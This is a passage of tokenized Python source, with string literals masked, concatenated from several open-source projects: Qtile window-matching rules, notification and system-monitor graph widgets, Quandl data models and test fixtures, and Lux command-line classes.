<EOL> wm_instance_class = None , net_wm_pid = None ) : <EOL> if not title : <EOL> title = [ ] <EOL> if not wm_class : <EOL> wm_class = [ ] <EOL> if not role : <EOL> role = [ ] <EOL> if not wm_type : <EOL> wm_type = [ ] <EOL> if not wm_instance_class : <EOL> wm_instance_class = [ ] <EOL> if not net_wm_pid : <EOL> net_wm_pid = [ ] <EOL> try : <EOL> net_wm_pid = list ( map ( int , net_wm_pid ) ) <EOL> except ValueError : <EOL> error = '<STR_LIT>' '<STR_LIT>' % str ( net_wm_pid ) <EOL> raise utils . QtileError ( error ) <EOL> self . _rules = [ ( '<STR_LIT:title>' , t ) for t in title ] <EOL> self . 
_rules += [ ( '<STR_LIT>' , w ) for w in wm_class ] <EOL> self . _rules += [ ( '<STR_LIT>' , r ) for r in role ] <EOL> self . _rules += [ ( '<STR_LIT>' , r ) for r in wm_type ] <EOL> self . _rules += [ ( '<STR_LIT>' , w ) for w in wm_instance_class ] <EOL> self . _rules += [ ( '<STR_LIT>' , w ) for w in net_wm_pid ] <EOL> def compare ( self , client ) : <EOL> for _type , rule in self . _rules : <EOL> if _type == "<STR_LIT>" : <EOL> def match_func ( value ) : <EOL> return rule == value <EOL> else : <EOL> match_func = getattr ( rule , '<STR_LIT>' , None ) or getattr ( rule , '<STR_LIT:count>' ) <EOL> if _type == '<STR_LIT:title>' : <EOL> value = client . name <EOL> elif _type == '<STR_LIT>' : <EOL> value = None <EOL> _value = client . window . get_wm_class ( ) <EOL> if _value and len ( _value ) > <NUM_LIT:1> : <EOL> value = _value [ <NUM_LIT:1> ] <EOL> elif _type == '<STR_LIT>' : <EOL> value = client . window . get_wm_class ( ) <EOL> if value : <EOL> value = value [ <NUM_LIT:0> ] <EOL> elif _type == '<STR_LIT>' : <EOL> value = client . window . get_wm_type ( ) <EOL> elif _type == '<STR_LIT>' : <EOL> value = client . window . get_net_wm_pid ( ) <EOL> else : <EOL> value = client . window . get_wm_window_role ( ) <EOL> if value and match_func ( value ) : <EOL> return True <EOL> return False <EOL> def map ( self , callback , clients ) : <EOL> """<STR_LIT>""" <EOL> for c in clients : <EOL> if self . compare ( c ) : <EOL> callback ( c ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . _rules <EOL> class Rule ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , match , group = None , float = False , intrusive = False , <EOL> break_on_match = True ) : <EOL> self . match = match <EOL> self . group = group <EOL> self . float = float <EOL> self . intrusive = intrusive <EOL> self . break_on_match = break_on_match <EOL> def matches ( self , w ) : <EOL> return self . match . compare ( w ) <EOL> def __repr__ ( self ) : <EOL> actions = utils . 
describe_attributes ( self , [ '<STR_LIT>' , '<STR_LIT:float>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return '<STR_LIT>' % ( self . match , actions ) </s>
<s> """<STR_LIT>""" <EOL> from . log_utils import logger <EOL> try : <EOL> import dbus <EOL> from dbus import service <EOL> from dbus . mainloop . glib import DBusGMainLoop <EOL> except ImportError : <EOL> dbus = None <EOL> BUS_NAME = '<STR_LIT>' <EOL> SERVICE_PATH = '<STR_LIT>' <EOL> if dbus : <EOL> class NotificationService ( service . Object ) : <EOL> def __init__ ( self , manager ) : <EOL> bus_name = service . BusName ( BUS_NAME , bus = dbus . SessionBus ( ) ) <EOL> service . Object . __init__ ( self , bus_name , SERVICE_PATH ) <EOL> self . manager = manager <EOL> @ service . method ( BUS_NAME , in_signature = '<STR_LIT>' , out_signature = '<STR_LIT>' ) <EOL> def GetCapabilities ( self ) : <EOL> return ( '<STR_LIT:body>' ) <EOL> @ service . method ( <EOL> BUS_NAME , in_signature = '<STR_LIT>' , out_signature = '<STR_LIT:u>' <EOL> ) <EOL> def Notify ( self , app_name , replaces_id , app_icon , summary , <EOL> body , actions , hints , timeout ) : <EOL> notif = Notification ( summary , body , timeout , hints ) <EOL> return self . manager . add ( notif ) <EOL> @ service . method ( BUS_NAME , in_signature = '<STR_LIT:u>' , out_signature = '<STR_LIT>' ) <EOL> def CloseNotification ( self , id ) : <EOL> pass <EOL> @ service . signal ( BUS_NAME , signature = '<STR_LIT>' ) <EOL> def NotificationClosed ( self , id_in , reason_in ) : <EOL> pass <EOL> @ service . method ( BUS_NAME , in_signature = '<STR_LIT>' , out_signature = '<STR_LIT>' ) <EOL> def GetServerInformation ( self ) : <EOL> return ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:1>" ) <EOL> class Notification ( object ) : <EOL> def __init__ ( self , summary , body = '<STR_LIT>' , timeout = - <NUM_LIT:1> , hints = None ) : <EOL> self . summary = summary <EOL> self . hints = hints or { } <EOL> self . body = body <EOL> self . timeout = timeout <EOL> class NotificationManager ( object ) : <EOL> def __init__ ( self ) : <EOL> self . notifications = [ ] <EOL> self . callbacks = [ ] <EOL> self . 
_service = None <EOL> @ property <EOL> def service ( self ) : <EOL> if dbus and self . _service is None : <EOL> try : <EOL> DBusGMainLoop ( set_as_default = True ) <EOL> self . _service = NotificationService ( self ) <EOL> except Exception : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> self . _service = None <EOL> return self . _service <EOL> def register ( self , callback ) : <EOL> if not self . service : <EOL> logger . warning ( <EOL> '<STR_LIT>' , <EOL> callback . __name__ , <EOL> ) <EOL> self . callbacks . append ( callback ) <EOL> def add ( self , notif ) : <EOL> self . notifications . append ( notif ) <EOL> notif . id = len ( self . notifications ) <EOL> for callback in self . callbacks : <EOL> callback ( notif ) <EOL> return len ( self . notifications ) <EOL> def show ( self , * args , ** kwargs ) : <EOL> notif = Notification ( * args , ** kwargs ) <EOL> return ( notif , self . add ( notif ) ) <EOL> notifier = NotificationManager ( ) </s>
<s> import cairocffi <EOL> from . import base <EOL> from libqtile . log_utils import logger <EOL> from os import statvfs <EOL> import time <EOL> import platform <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> class _Graph ( base . _Widget ) : <EOL> fixed_upper_bound = False <EOL> defaults = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:2> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:100> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:type>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> def __init__ ( self , width = <NUM_LIT:100> , ** config ) : <EOL> base . _Widget . __init__ ( self , width , ** config ) <EOL> self . add_defaults ( _Graph . defaults ) <EOL> self . values = [ <NUM_LIT:0> ] * self . samples <EOL> self . maxvalue = <NUM_LIT:0> <EOL> self . oldtime = time . time ( ) <EOL> self . lag_cycles = <NUM_LIT:0> <EOL> def timer_setup ( self ) : <EOL> self . timeout_add ( self . frequency , self . update ) <EOL> @ property <EOL> def graphwidth ( self ) : <EOL> return self . width - self . border_width * <NUM_LIT:2> - self . margin_x * <NUM_LIT:2> <EOL> @ property <EOL> def graphheight ( self ) : <EOL> return self . bar . height - self . margin_y * <NUM_LIT:2> - self . border_width * <NUM_LIT:2> <EOL> def draw_box ( self , x , y , values ) : <EOL> step = self . graphwidth / float ( self . samples ) <EOL> self . drawer . set_source_rgb ( self . graph_color ) <EOL> for val in values : <EOL> val = self . val ( val ) <EOL> self . drawer . 
fillrect ( x , y - val , step , val ) <EOL> x += step <EOL> def draw_line ( self , x , y , values ) : <EOL> step = self . graphwidth / float ( self . samples - <NUM_LIT:1> ) <EOL> self . drawer . ctx . set_line_join ( cairocffi . LINE_JOIN_ROUND ) <EOL> self . drawer . set_source_rgb ( self . graph_color ) <EOL> self . drawer . ctx . set_line_width ( self . line_width ) <EOL> for val in values : <EOL> self . drawer . ctx . line_to ( x , y - self . val ( val ) ) <EOL> x += step <EOL> self . drawer . ctx . stroke ( ) <EOL> def draw_linefill ( self , x , y , values ) : <EOL> step = self . graphwidth / float ( self . samples - <NUM_LIT:2> ) <EOL> self . drawer . ctx . set_line_join ( cairocffi . LINE_JOIN_ROUND ) <EOL> self . drawer . set_source_rgb ( self . graph_color ) <EOL> self . drawer . ctx . set_line_width ( self . line_width ) <EOL> for index , val in enumerate ( values ) : <EOL> self . drawer . ctx . line_to ( x + index * step , y - self . val ( val ) ) <EOL> self . drawer . ctx . stroke_preserve ( ) <EOL> self . drawer . ctx . line_to ( <EOL> x + ( len ( values ) - <NUM_LIT:1> ) * step , <EOL> y - <NUM_LIT:1> + self . line_width / <NUM_LIT> <EOL> ) <EOL> self . drawer . ctx . line_to ( x , y - <NUM_LIT:1> + self . line_width / <NUM_LIT> ) <EOL> self . drawer . set_source_rgb ( self . fill_color ) <EOL> self . drawer . ctx . fill ( ) <EOL> def val ( self , val ) : <EOL> if self . start_pos == '<STR_LIT>' : <EOL> return val <EOL> elif self . start_pos == '<STR_LIT>' : <EOL> return - val <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % self . start_pos ) <EOL> def draw ( self ) : <EOL> self . drawer . clear ( self . background or self . bar . background ) <EOL> if self . border_width : <EOL> self . drawer . set_source_rgb ( self . border_color ) <EOL> self . drawer . ctx . set_line_width ( self . border_width ) <EOL> self . drawer . ctx . rectangle ( <EOL> self . margin_x + self . border_width / <NUM_LIT> , <EOL> self . margin_y + self . 
border_width / <NUM_LIT> , <EOL> self . graphwidth + self . border_width , <EOL> self . bar . height - self . margin_y * <NUM_LIT:2> - self . border_width , <EOL> ) <EOL> self . drawer . ctx . stroke ( ) <EOL> x = self . margin_x + self . border_width <EOL> y = self . margin_y + self . border_width <EOL> if self . start_pos == '<STR_LIT>' : <EOL> y += self . graphheight <EOL> elif not self . start_pos == '<STR_LIT>' : <EOL> raise ValueError ( "<STR_LIT>" % self . start_pos ) <EOL> k = <NUM_LIT:1.0> / ( self . maxvalue or <NUM_LIT:1> ) <EOL> scaled = [ self . graphheight * val * k for val in reversed ( self . values ) ] <EOL> if self . type == "<STR_LIT>" : <EOL> self . draw_box ( x , y , scaled ) <EOL> elif self . type == "<STR_LIT>" : <EOL> self . draw_line ( x , y , scaled ) <EOL> elif self . type == "<STR_LIT>" : <EOL> self . draw_linefill ( x , y , scaled ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % self . type ) <EOL> self . drawer . draw ( offsetx = self . offset , width = self . width ) <EOL> def push ( self , value ) : <EOL> if self . lag_cycles > self . samples : <EOL> self . lag_cycles = <NUM_LIT:1> <EOL> self . values = ( [ value ] * min ( self . samples , self . lag_cycles ) ) + self . values <EOL> self . values = self . values [ : self . samples ] <EOL> if not self . fixed_upper_bound : <EOL> self . maxvalue = max ( self . values ) <EOL> self . draw ( ) <EOL> def update ( self ) : <EOL> newtime = time . time ( ) <EOL> self . lag_cycles = int ( ( newtime - self . oldtime ) / self . frequency ) <EOL> self . oldtime = newtime <EOL> self . update_graph ( ) <EOL> self . timeout_add ( self . frequency , self . update ) <EOL> def fulfill ( self , value ) : <EOL> self . values = [ value ] * len ( self . values ) <EOL> class CPUGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . 
ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( "<STR_LIT>" , "<STR_LIT:all>" , "<STR_LIT>" ) , <EOL> ] <EOL> fixed_upper_bound = True <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( CPUGraph . defaults ) <EOL> self . maxvalue = <NUM_LIT:100> <EOL> self . oldvalues = self . _getvalues ( ) <EOL> def _getvalues ( self ) : <EOL> proc = '<STR_LIT>' <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> proc = '<STR_LIT>' + proc <EOL> with open ( proc ) as file : <EOL> lines = file . readlines ( ) <EOL> line = lines . pop ( <NUM_LIT:0> ) <EOL> if isinstance ( self . core , int ) : <EOL> line = lines [ self . core ] <EOL> if not line . startswith ( "<STR_LIT>" % self . core ) : <EOL> raise ValueError ( "<STR_LIT>" % self . core ) <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> name , user , nice , sys , idle = line . split ( None , <NUM_LIT:4> ) <EOL> else : <EOL> name , user , nice , sys , idle , iowait , tail = line . split ( None , <NUM_LIT:6> ) <EOL> return ( int ( user ) , int ( nice ) , int ( sys ) , int ( idle ) ) <EOL> def update_graph ( self ) : <EOL> nval = self . _getvalues ( ) <EOL> oval = self . oldvalues <EOL> busy = nval [ <NUM_LIT:0> ] + nval [ <NUM_LIT:1> ] + nval [ <NUM_LIT:2> ] - oval [ <NUM_LIT:0> ] - oval [ <NUM_LIT:1> ] - oval [ <NUM_LIT:2> ] <EOL> total = busy + nval [ <NUM_LIT:3> ] - oval [ <NUM_LIT:3> ] <EOL> if total : <EOL> push_value = busy * <NUM_LIT> / total <EOL> self . push ( push_value ) <EOL> else : <EOL> self . push ( self . values [ <NUM_LIT:0> ] ) <EOL> self . oldvalues = nval <EOL> def get_meminfo ( ) : <EOL> val = { } <EOL> proc = '<STR_LIT>' <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> proc = "<STR_LIT>" + proc <EOL> with open ( proc ) as file : <EOL> for line in file : <EOL> if line . lstrip ( ) . startswith ( "<STR_LIT>" ) : <EOL> pass <EOL> else : <EOL> key , tail = line . strip ( ) . split ( '<STR_LIT::>' ) <EOL> uv = tail . 
split ( ) <EOL> val [ key ] = int ( uv [ <NUM_LIT:0> ] ) <EOL> val [ '<STR_LIT>' ] = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] <EOL> return val <EOL> class MemoryGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> fixed_upper_bound = True <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> val = self . _getvalues ( ) <EOL> self . maxvalue = val [ '<STR_LIT>' ] <EOL> mem = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] <EOL> self . fulfill ( mem ) <EOL> def _getvalues ( self ) : <EOL> return get_meminfo ( ) <EOL> def update_graph ( self ) : <EOL> val = self . _getvalues ( ) <EOL> self . push ( <EOL> val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] <EOL> ) <EOL> class SwapGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> fixed_upper_bound = True <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> val = self . _getvalues ( ) <EOL> self . maxvalue = val [ '<STR_LIT>' ] <EOL> swap = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> self . fulfill ( swap ) <EOL> def _getvalues ( self ) : <EOL> return get_meminfo ( ) <EOL> def update_graph ( self ) : <EOL> val = self . _getvalues ( ) <EOL> swap = val [ '<STR_LIT>' ] - val [ '<STR_LIT>' ] - val . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if self . maxvalue != val [ '<STR_LIT>' ] : <EOL> self . maxvalue = val [ '<STR_LIT>' ] <EOL> self . fulfill ( swap ) <EOL> self . push ( swap ) <EOL> class NetGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . 
add_defaults ( NetGraph . defaults ) <EOL> if self . interface == "<STR_LIT>" : <EOL> try : <EOL> self . interface = self . get_main_iface ( ) <EOL> except RuntimeError : <EOL> logger . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . interface = "<STR_LIT>" <EOL> self . filename = '<STR_LIT>' . format ( <EOL> interface = self . interface , <EOL> type = self . bandwidth_type == '<STR_LIT>' and '<STR_LIT>' or '<STR_LIT>' <EOL> ) <EOL> self . bytes = <NUM_LIT:0> <EOL> self . bytes = self . _getValues ( ) <EOL> def _getValues ( self ) : <EOL> try : <EOL> with open ( self . filename ) as file : <EOL> val = int ( file . read ( ) ) <EOL> rval = val - self . bytes <EOL> self . bytes = val <EOL> return rval <EOL> except IOError : <EOL> return <NUM_LIT:0> <EOL> def update_graph ( self ) : <EOL> val = self . _getValues ( ) <EOL> self . push ( val ) <EOL> @ staticmethod <EOL> def get_main_iface ( ) : <EOL> def make_route ( line ) : <EOL> return dict ( zip ( [ '<STR_LIT>' , '<STR_LIT>' ] , line . split ( ) ) ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as fp : <EOL> lines = fp . readlines ( ) <EOL> routes = [ make_route ( line ) for line in lines [ <NUM_LIT:1> : ] ] <EOL> try : <EOL> return next ( <EOL> ( r for r in routes if not int ( r [ '<STR_LIT>' ] , <NUM_LIT:16> ) ) , <EOL> routes [ <NUM_LIT:0> ] <EOL> ) [ '<STR_LIT>' ] <EOL> except ( KeyError , IndexError , ValueError ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> class HDDGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> fixed_upper_bound = True <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( "<STR_LIT:path>" , "<STR_LIT:/>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( HDDGraph . defaults ) <EOL> stats = statvfs ( self . path ) <EOL> self . maxvalue = stats . f_blocks * stats . f_frsize <EOL> values = self . 
_getValues ( ) <EOL> self . fulfill ( values ) <EOL> def _getValues ( self ) : <EOL> stats = statvfs ( self . path ) <EOL> if self . space_type == '<STR_LIT>' : <EOL> return ( stats . f_blocks - stats . f_bfree ) * stats . f_frsize <EOL> else : <EOL> return stats . f_bavail * stats . f_frsize <EOL> def update_graph ( self ) : <EOL> val = self . _getValues ( ) <EOL> self . push ( val ) <EOL> class HDDBusyGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( HDDBusyGraph . defaults ) <EOL> self . path = '<STR_LIT>' . format ( <EOL> dev = self . device <EOL> ) <EOL> self . _prev = <NUM_LIT:0> <EOL> def _getActivity ( self ) : <EOL> try : <EOL> with open ( self . path ) as f : <EOL> io_ticks = int ( f . read ( ) . split ( ) [ <NUM_LIT:9> ] ) <EOL> except IOError : <EOL> return <NUM_LIT:0> <EOL> activity = io_ticks - self . _prev <EOL> self . _prev = io_ticks <EOL> return activity <EOL> def update_graph ( self ) : <EOL> self . push ( self . _getActivity ( ) ) </s>
<s> from . import base <EOL> from libqtile . log_utils import logger <EOL> try : <EOL> from pythonwifi . iwlibs import Wireless , Iwstats <EOL> def get_status ( interface ) : <EOL> interface = Wireless ( interface ) <EOL> try : <EOL> stats = Iwstats ( interface ) <EOL> except IOError : <EOL> return ( None , None ) <EOL> quality = stats . qual . quality <EOL> essid = interface . getEssid ( ) <EOL> return ( essid , quality ) <EOL> except ImportError : <EOL> import iwlib <EOL> def get_status ( interface ) : <EOL> interface = iwlib . get_iwconfig ( interface ) <EOL> if '<STR_LIT>' not in interface : <EOL> return ( None , None ) <EOL> quality = interface [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> essid = bytes ( interface [ '<STR_LIT>' ] ) . decode ( ) <EOL> return ( essid , quality ) <EOL> class Wlan ( base . InLoopPollText ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> base . InLoopPollText . __init__ ( self , ** config ) <EOL> self . add_defaults ( Wlan . defaults ) <EOL> def poll ( self ) : <EOL> try : <EOL> essid , quality = get_status ( self . interface ) <EOL> disconnected = essid is None <EOL> if disconnected : <EOL> return self . disconnected_message <EOL> return self . format . format ( <EOL> essid = essid , <EOL> quality = quality , <EOL> percent = ( quality / <NUM_LIT> ) <EOL> ) <EOL> except EnvironmentError : <EOL> logger . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> self . __class__ . __name__ ) </s>
<s> from quandl . operations . data_list import DataListOperation <EOL> from quandl . util import Util <EOL> from . model_base import ModelBase <EOL> from . data_mixin import DataMixin <EOL> class Data ( DataListOperation , DataMixin , ModelBase ) : <EOL> def __init__ ( self , data , ** options ) : <EOL> self . meta = options [ '<STR_LIT>' ] <EOL> self . _raw_data = Util . convert_to_dates ( data ) <EOL> if '<STR_LIT>' in options . keys ( ) : <EOL> self . _converted_column_names = options [ '<STR_LIT>' ] <EOL> def data_fields ( self ) : <EOL> if not self . _converted_column_names and self . meta : <EOL> self . _converted_column_names = Util . convert_column_names ( self . meta ) <EOL> return self . _converted_column_names <EOL> def __getattr__ ( self , k ) : <EOL> if k [ <NUM_LIT:0> ] == '<STR_LIT:_>' and k != '<STR_LIT>' : <EOL> raise AttributeError ( k ) <EOL> elif k in self . meta : <EOL> return self . meta [ k ] <EOL> elif k in self . data_fields ( ) : <EOL> return self . _raw_data [ self . data_fields ( ) . index ( k ) ] <EOL> return super ( Data , self ) . __getattr__ ( k ) </s>
<s> import re <EOL> import jsondate as json <EOL> import six <EOL> from quandl . model . dataset import Dataset <EOL> from quandl . model . data import Data <EOL> from quandl . model . data_list import DataList <EOL> from test . factories . dataset import DatasetFactory <EOL> from test . factories . dataset_data import DatasetDataFactory <EOL> def setupDatasetsTest ( unit_test , httpretty ) : <EOL> httpretty . reset ( ) <EOL> httpretty . enable ( ) <EOL> unit_test . dataset_data = { '<STR_LIT>' : DatasetDataFactory . build ( ) } <EOL> single_col_data = DatasetDataFactory . build ( column_names = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] , <EOL> data = [ [ '<STR_LIT>' , <NUM_LIT> ] , [ '<STR_LIT>' , <NUM_LIT> ] , <EOL> [ '<STR_LIT>' , <NUM_LIT> ] , [ '<STR_LIT>' , <NUM_LIT> ] ] ) <EOL> unit_test . single_dataset_data = { '<STR_LIT>' : single_col_data } <EOL> dataset_data = DatasetDataFactory . build ( ) <EOL> d_values = dataset_data . pop ( '<STR_LIT:data>' ) <EOL> d_metadata = dataset_data <EOL> unit_test . data_list_obj = DataList ( Data , d_values , d_metadata ) <EOL> unit_test . nse_oil = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' ) } <EOL> unit_test . goog_aapl = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' ) } <EOL> unit_test . goog_msft = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' , <EOL> newest_available_date = '<STR_LIT>' , oldest_available_date = '<STR_LIT>' ) } <EOL> unit_test . single_col = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' , <EOL> newest_available_date = '<STR_LIT>' , oldest_available_date = '<STR_LIT>' ) } <EOL> unit_test . oil_obj = Dataset ( '<STR_LIT>' , unit_test . nse_oil [ '<STR_LIT>' ] ) <EOL> unit_test . aapl_obj = Dataset ( '<STR_LIT>' , unit_test . 
goog_aapl [ '<STR_LIT>' ] ) <EOL> unit_test . goog_obj = Dataset ( '<STR_LIT>' , unit_test . goog_msft [ '<STR_LIT>' ] ) <EOL> unit_test . single_col_obj = Dataset ( '<STR_LIT>' , unit_test . single_col [ '<STR_LIT>' ] ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> re . compile ( <EOL> '<STR_LIT>' ) , <EOL> responses = [ httpretty . Response ( body = json . dumps ( dataset ) ) <EOL> for dataset in <EOL> [ unit_test . nse_oil , unit_test . goog_aapl , <EOL> unit_test . goog_msft ] ] ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> "<STR_LIT>" , <EOL> body = json . dumps ( unit_test . single_dataset_data ) ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> "<STR_LIT>" , <EOL> body = json . dumps ( unit_test . dataset_data ) ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> re . compile ( <EOL> '<STR_LIT>' ) , <EOL> body = json . dumps ( unit_test . dataset_data ) ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> re . compile ( <EOL> '<STR_LIT>' ) , <EOL> body = json . dumps ( unit_test . dataset_data ) ) </s>
<s> '''<STR_LIT>''' <EOL> import argparse <EOL> import logging <EOL> from pulsar import Setting , Application , ImproperlyConfigured , isawaitable <EOL> from pulsar . utils . config import Config , LogLevel , Debug , LogHandlers <EOL> from lux import __version__ <EOL> from lux . utils . async import maybe_green <EOL> class ConfigError ( Exception ) : <EOL> def __init__ ( self , config_file ) : <EOL> self . config_file = config_file <EOL> class CommandError ( ImproperlyConfigured ) : <EOL> pass <EOL> def service_parser ( services , description , help = True ) : <EOL> description = description or '<STR_LIT>' <EOL> p = argparse . ArgumentParser ( <EOL> description = description , add_help = help ) <EOL> p . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:?>' , choices = services , <EOL> help = '<STR_LIT>' ) <EOL> return p <EOL> class ConsoleParser ( object ) : <EOL> '''<STR_LIT>''' <EOL> help = None <EOL> option_list = ( ) <EOL> default_option_list = ( LogLevel ( ) , <EOL> LogHandlers ( default = [ '<STR_LIT>' ] ) , <EOL> Debug ( ) ) <EOL> @ property <EOL> def config_module ( self ) : <EOL> raise NotImplementedError <EOL> def get_version ( self ) : <EOL> raise NotImplementedError <EOL> def get_parser ( self , ** params ) : <EOL> parser = argparse . ArgumentParser ( ** params ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:version>' , <EOL> version = self . get_version ( ) , <EOL> help = "<STR_LIT>" ) <EOL> config = Setting ( '<STR_LIT>' , <EOL> ( '<STR_LIT:-c>' , '<STR_LIT>' ) , <EOL> default = self . config_module , <EOL> desc = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> config . add_argument ( parser , True ) <EOL> for opt in self . default_option_list : <EOL> opt . add_argument ( parser , True ) <EOL> for opt in self . option_list : <EOL> opt . add_argument ( parser , True ) <EOL> return parser <EOL> class LuxApp ( Application ) : <EOL> def __call__ ( self ) : <EOL> try : <EOL> return super ( ) . 
__call__ ( ) <EOL> except ImproperlyConfigured : <EOL> pass <EOL> def on_config ( self , actor ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class LuxCommand ( ConsoleParser ) : <EOL> '''<STR_LIT>''' <EOL> pulsar_config_include = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , name , app ) : <EOL> self . name = name <EOL> self . app = app <EOL> def __call__ ( self , argv , ** params ) : <EOL> app = self . pulsar_app ( argv ) <EOL> app ( ) <EOL> assert self . app . wsgi_handler ( ) <EOL> result = maybe_green ( self . app , self . run , app . cfg , ** params ) <EOL> if isawaitable ( result ) and not self . app . _loop . is_running ( ) : <EOL> result = self . app . _loop . run_until_complete ( result ) <EOL> return result <EOL> def get_version ( self ) : <EOL> """<STR_LIT>""" <EOL> return __version__ <EOL> @ property <EOL> def config_module ( self ) : <EOL> return self . app . config_module <EOL> def run ( self , argv , ** params ) : <EOL> '''<STR_LIT>''' <EOL> raise NotImplementedError <EOL> @ property <EOL> def logger ( self ) : <EOL> return logging . getLogger ( '<STR_LIT>' % self . name ) <EOL> def write ( self , stream = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> self . app . write ( stream ) <EOL> def write_err ( self , stream = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> self . app . write_err ( stream ) <EOL> def pulsar_app ( self , argv , application = None , log_name = '<STR_LIT>' , ** kw ) : <EOL> app = self . app <EOL> if application is None : <EOL> application = LuxApp <EOL> cfg = Config ( include = self . pulsar_config_include ) <EOL> else : <EOL> cfg = application . cfg 